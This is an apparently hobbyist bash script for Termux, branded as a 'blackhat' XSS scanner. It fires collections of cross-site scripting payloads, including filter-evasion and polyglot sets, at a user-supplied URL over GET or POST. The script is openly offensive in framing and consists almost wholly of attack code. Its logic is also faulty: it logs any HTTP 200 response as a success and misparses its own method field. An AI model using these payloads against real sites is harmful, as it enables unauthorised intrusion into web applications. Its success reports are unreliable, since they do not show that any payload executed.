BLACKHAT XSS VULNERABILITY SCANNER

1. #!/data/data/com.termux/files/usr/bin/bash
2.  
3. RED='\033[0;31m'
4. GREEN='\033[1;32m'
5. YELLOW='\033[1;33m'
6. CYAN='\033[1;36m'
7. MAGENTA='\033[1;35m'
8. WHITE='\033[1;37m'
9. RESET='\033[0m'
10.  
11. LOG_FILE="logs/xss_blackhat_$(date +%Y%m%d_%H%M%S).log"
12. mkdir -p logs
13.  
14. banner() {
15. clear
16. echo -e "${MAGENTA}"
17. echo -e "⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣤⣤⠴⠶⠶⠶⠶⠶⠶⠶⠶⢤⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀"
18. echo -e "⠀⠀⠀⠀⢀⣤⠶⠛⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠛⠶⣤⡀⠀⠀⠀⠀⠀"
19. echo -e "⠀⠀⢀⡴⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⢷⡄⠀⠀⠀"
20. echo -e "⠀⣰⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣦⠀⠀"
21. echo -e "⢰⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠹⣧⠀"
22. echo -e "⣿⠀⠀⣤⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⡄⠀⢹⡄"
23. echo -e "⡏⠀⢰⡏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠀⢸⡇"
24. echo -e "⣿⠀⠘⣇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡟⠀⢸⡇"
25. echo -e "⢹⡆⠀⢹⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣼⠃⠀⣾⠀"
26. echo -e "⠈⢷⡀⢸⡇⠀⢀⣠⣤⣶⣶⣶⣤⡀⠀⠀⠀⠀⠀⢀⣠⣶⣶⣶⣶⣤⣄⠀⠀⣿⠀⣼⠃⠀"
27. echo -e "⠀⠈⢷⣼⠃⠀⣿⣿⣿⣿⣿⣿⣿⣿⡄⠀⠀⠀⠀⣾⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⡾⠃⠀⠀"
28. echo -e "⠀⠀⠈⣿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⠁⠀⠀⠀⠀⢹⣿⣿⣿⣿⣿⣿⣿⠃⠀⢸⡇⠀⠀⠀"
29. echo -e "⠀⠀⠀⣿⠀⠀⠘⢿⣿⣿⣿⣿⡿⠃⠀⢠⠀⣄⠀⠀⠙⢿⣿⣿⣿⡿⠏⠀⠀⢘⡇⠀⠀⠀"
30. echo -e "⠀⠀⠀⢻⡄⠀⠀⠀⠈⠉⠉⠀⠀⠀⣴⣿⠀⣿⣷⠀⠀⠀⠀⠉⠁⠀⠀⠀⠀⢸⡇⠀⠀⠀"
31. echo -e "⠀⠀⠀⠈⠻⣄⡀⠀⠀⠀⠀⠀⠀⢠⣿⣿⠀⣿⣿⣇⠀⠀⠀⠀⠀⠀⠀⢀⣴⠟⠀⠀⠀⠀"
32. echo -e "⠀⠀⠀⠀⠀⠘⣟⠳⣦⡀⠀⠀⠀⠸⣿⡿⠀⢻⣿⡟⠀⠀⠀⠀⣤⡾⢻⡏⠁⠀⠀⠀⠀⠀"
33. echo -e "⠀⠀⠀⠀⠀⠀⢻⡄⢻⠻⣆⠀⠀⠀⠈⠀⠀⠀⠈⠀⠀⠀⢀⡾⢻⠁⢸⠁⠀⠀⠀⠀⠀⠀"
34. echo -e "⠀⠀⠀⠀⠀⠀⢸⡇⠀⡆⢹⠒⡦⢤⠤⡤⢤⢤⡤⣤⠤⡔⡿⢁⡇⠀⡿⠀⠀⠀⠀⠀⠀⠀"
35. echo -e "⠀⠀⠀⠀⠀⠀⠘⡇⠀⢣⢸⠦⣧⣼⣀⡇⢸⢀⣇⣸⣠⡷⢇⢸⠀⠀⡇⠀⠀⠀⠀⠀⠀⠀"
36. echo -e "⠀⠀⠀⠀⠀⠀⠀⣷⠀⠈⠺⣄⣇⢸⠉⡏⢹⠉⡏⢹⢀⣧⠾⠋⠀⢠⡇⠀⠀⠀⠀⠀⠀⠀"
37. echo -e "⠀⠀⠀⠀⠀⠀⠀⠻⣆⠀⠀⠀⠈⠉⠙⠓⠚⠚⠋⠉⠁⠀⠀⠀⢀⡾⠁⠀⠀⠀⠀⠀⠀⠀"
38. echo -e "⠀⠀⠀⠀⠀⠀⠀⠀⠙⢷⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⡴⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀"
39. echo -e "⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠳⠶⠦⣤⣤⣤⡤⠶⠞⠋⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀"
40. echo -e ""
41. echo -e "${RESET}${RED}        BLACKHAT XSS VULNERABILITY SCANNER${RESET}"
42. echo -e "${WHITE}  Web Application Reconnaissance | Threat Injection Engine${RESET}\n"
43. }
44.  
45. menu() {
46. echo -e "${CYAN}1.${RESET} Launch Recon Assault"
47. echo -e "${CYAN}2.${RESET} Abort Operation"
48. read -p $'\nSelect: ' input
49. [[ "$input" == "1" ]] && setup
50. [[ "$input" == "2" ]] && exit
51. menu
52. }
53.  
54. setup() {
55. read -p $'\nTarget URL (use FUZZ where payload injects): ' target
56. [[ "$target" != *FUZZ* ]] && echo -e "${RED}Missing FUZZ keyword. Restarting.${RESET}" && sleep 2 && menu
57. echo -e "\n${CYAN}METHODS:"
58. echo -e "1. GET"
59. echo -e "2. POST${RESET}"
60. read -p $'\nChoose method: ' method
61. case $method in
62. 1) verb="GET" ;;
63. 2) verb="POST" ;;
64. *) setup ;;
65. esac
66. echo -e "\n${CYAN}PAYLOAD SET:"
67. echo -e "1. Basic Recon"
68. echo -e "2. Advanced Weapons"
69. echo -e "3. WAF Infiltration"
70. echo -e "4. Polyglot Injection"
71. echo -e "5. CHAOS MODE${RESET}"
72. read -p $'\nSelect set: ' set
73. read -p $'\nThread Count: ' threads
74. [[ "$threads" =~ ^[0-9]+$ ]] || threads=10
75. load_payloads "$set"
76. fuzz "$target" "$verb" "$threads"
77. }
78.  
79. load_payloads() {
80. payloads=()
81. [[ "$1" == "1" || "$1" == "5" ]] && payloads+=(
82. "<script>alert(1)</script>" "<img src=x onerror=alert(1)>"
83. "<svg/onload=alert(1)>" "<body onload=alert(1)>"
84. "<iframe src='javascript:alert(1)'>" "<a href='javascript:alert(1)'>X</a>"
85. "<input onfocus=alert(1) autofocus>" "<video onloadstart=alert(1)>"
86. "<marquee onstart=alert(1)>" "<object data='javascript:alert(1)'>"
87. )
88. [[ "$1" == "2" || "$1" == "5" ]] && payloads+=(
89. "\"><script>alert(document.domain)</script>"
90. "<img src=1 href=1 onerror=\"alert(1)\">"
91. "<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></svg>"
92. "<form><button formaction='javascript:alert(1)'>"
93. "<script>new Function`alert(1)`</script>"
94. "<svg><g onload=\"javascript:alert(1)\">"
95. "<meta http-equiv=\"refresh\" content=\"0;url=javascript:alert(1)\">"
96. "<iframe srcdoc='<script>alert(1)</script>'>"
97. )
98. [[ "$1" == "3" || "$1" == "5" ]] && payloads+=(
99. "<script>eval(atob('YWxlcnQoMSk='))</script>"
100. "<img src/onerror=`alert(1)`>" "<body background='javascript:alert(1)'>"
101. "\"><img src=x onerror=alert(1)>" "';alert(String.fromCharCode(88,83,83))//"
102. "<svg><script xlink:href='data:text/javascript,alert(1)'></script></svg>"
103. "<object data='data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>"
104. )
105. [[ "$1" == "4" || "$1" == "5" ]] && payloads+=(
106. "<svg/onload=confirm`1`>"
107. "<style>@keyframes a{}body{animation-name:a}body{animation-duration:0.00001s}body{onanimationstart=alert(1)}</style>"
108. "<math><mtext></title><script>alert(1)</script>"
109. "<script src=data:text/javascript,alert(1)></script>"
110. "<svg><animate onbegin=alert(1) attributeName=x dur=1s fill=freeze to=100/>"
111. "<iframe srcdoc=\"<script>alert(1)</script>\">"
112. "<svg><set attributeName=x to=1 begin=0s onbegin=alert(1)/>"
113. "<isindex onfocus=alert(1) autofocus>"
114. )
115. }
116.  
117. log_success() {
118. echo -e "[SUCCESS] $1" | tee -a "$LOG_FILE"
119. }
120.  
121. log_fail() {
122. echo -e "[FAIL] $1" >> "$LOG_FILE"
123. }
124.  
125. fuzz() {
126. target="$1"
127. method="$2"
128. threads="$3"
129. printf "\n${YELLOW}Injecting %s payloads using %s requests...${RESET}\n\n" "${#payloads[@]}" "$method"
130. export -f send_payload log_success log_fail
131. parallel -j "$threads" send_payload ::: "${payloads[@]}" <<< "$target|$method"
132. }
133.  
134. send_payload() {
135. payload="$1"
136. read -r target method
137. req="${target//FUZZ/$(printf '%q' "$payload")}"
138. if [[ "$method" == "GET" ]]; then
139.     resp=$(curl -s -o /dev/null -w "%{http_code}" "$req")
140. else
141.     resp=$(curl -s -o /dev/null -w "%{http_code}" -X POST -d "input=$(printf '%q' "$payload")" "$target")
142. fi
143. if [[ "$resp" == "200" ]]; then
144.     log_success "$payload"
145. else
146.     log_fail "$payload"
147. fi
148. }
149.  
150. banner
151. menu